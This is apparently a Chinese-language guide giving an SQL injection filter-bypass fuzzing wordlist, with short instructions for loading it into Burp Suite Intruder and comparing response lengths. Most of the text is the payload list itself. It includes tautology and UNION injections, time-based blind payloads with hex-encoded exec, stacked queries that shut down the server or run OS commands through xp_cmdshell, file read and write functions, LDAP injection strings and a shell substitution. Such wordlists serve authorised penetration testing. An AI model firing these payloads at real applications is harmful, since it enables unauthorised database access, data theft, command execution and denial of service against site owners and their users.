SQL注入过滤绕过fuzz字典

使用场景

后端可能存在SQL注入的漏洞，但是对参数有一些过滤。

当我们不确定过滤了什么符号、函数时，可以使用FUZZ字典。

通过对比响应的结果的区别，我们就能知道什么关键字有过滤，什么关键字没有，然后可以使用没有过滤的关键字进行注入。

思路就是找不一样的响应结果。

字典

'
"
#
--
--+
--';
' --
' ; 
' or ''='
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1
' or 1=1--
' or 1=1 or ''='
' or 1=1/*
' or 1=1#
' or '1'='1
' or '1'='1'--
' or 2>1
' or 3=3
' or a=a
' or username like '%
' or user like '%
' or uname like '%
' or userid like '%
' or uid like '%
" or 1=1
" or 1=1--
" or 1=1 or ""="
" or a=a
x' or 1=1
x' or 1=1 or 'x'='y
x' AND userid IS NULL; --
admin'--
admin' or '1'='1
' UNION SELECT
' UNION ALL SELECT
' OR EXISTS (
' (select top 1
\x27UNION SELECT
1;SELECT *
1 OR 1=1
1' OR '1'='1
0 or 1=1
or 1=1
or 1=1--
or 0=0
or 0=0--
or a=a
or%201=1
or%201=1--
anandd
oorr
oroR
AND 1=1
OR 1=1
XOR 1=1
;
%3B
|
%7C
&
%26
!
%21
(
%28
)
%29
=
%3D
<
%3C
>
%3E
<>
%3C%3E
+
-
~
^
*
%2A
/
//
//*
*/*
/**/
%00
%0A
%0a
%0C
%0c
%0D
%0d
%0b
%a0
%20
%09
%df
%27
%22
%23
%2D%2D
@variable
,@variable
SELECT
SeLeCt
select 
INSERT
insERT
UPDATE
DELETE
DROP
CREATE
ALTER
DATABASE
database
FROM
from
WHERE
where
HAVING
having
GROUP BY
ORDER BY
order by
asc
desc
LIMIT
limit
LimIt
UNION
union
UNIon
JOIN
INTO
VALUES
SET
TABLE
COLUMN
SCHEMA
INFORMATION
information_schema
sys.schema_table_statistics_with_buffer
TABLE_SCHEMA
user
users
USER
VERSION
@@version
BENCHMARK
benchmark
SLEEP
sleep
SLEEp
WAITFOR DELAY '0:0:5'
SLEEP(5)
BENCHMARK(1000000,MD5(1))
handler
LIKE
like
LiKe
CAST
CAST()
CONCAT
concat
CONCAT_WS
concat_ws()
GROUP_CONCAT
group_concat
SUBSTRING
substring
MID
mid
ASCII
ascii
ORD
ord
BIN
bin
FORMAT
format
FLOOR
floor
RAND
rand()
INSTR
instr
REVERSE
EXTRACTVALUE
extractvalue
UPDATEXML
updatexml
PREPARE
EXEC
exec
exec xp
exec sp
exec master..xp_cmdshell
exec xp_regread
xp_cmdshell
sp_password
BFILENAME
LOAD_FILE
INFILE
OUTFILE
DUMPFILE
PROCEDURE
PROCEDURE ANALYSE()
DISTINCT
TRUNCATE
REPLACE
BEFORE
REGEXP
RLIKE
IN
in
CASE
case
WHEN
when
THEN
then
ELSE
else
END
end
IF
IFNULL
NULL
TRUE
FALSE
@
@@
%2F*
*%2F
%2F%2A
%2A%2F
%26%26
%7C%7C
%60
%2C
%27%20OR
%27%20or%201%3D1
%20or%201%3D1
%27%20or%201%3D1
%20%28sleep%2050%29
%20%27sleep%2050%27
char%4039%41%2b%40SELECT
'%20OR
'sqlattempt1
(sqlattempt2)
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 1=1 or ''='
" or 1=1 or ""="
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
PRINT
PRINT @@variable
'; shutdown --
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
t'exec master..xp_cmdshell 'nslookup www.google.com'--
'||UTL_HTTP.REQUEST
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%20$(sleep%2050)
' and '' like '
' AnD '' like '
' or '' like '
' and '' like '%
' aND '' like '%
' and '' like ''--
' and 2>1--
' and 2>3--
') and ('x'='x
) and (1=1
'or''='
'or'='or'
a' or 1=1--
"a"" or 1=1--"
 or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
' or (EXISTS)
' AND 1=(SELECT COUNT(*) FROM tabname); --
' AND members.email IS NULL; --
' OR full_name LIKE '%Bob%

使用方法

使用Burp Suite抓包，发送到Intruder模块。

标记有可能有注入漏洞的字段。

字典选择以上内容，可以粘贴，也可以从文件读取。

发送攻击，查看响应长度，再查看具体响应内容。

如果所有的响应长度都一样，说明有可能没有注入漏洞，或者全部都被过滤了。

如果响应长度分为几种，那么可以看看响应内容的区别。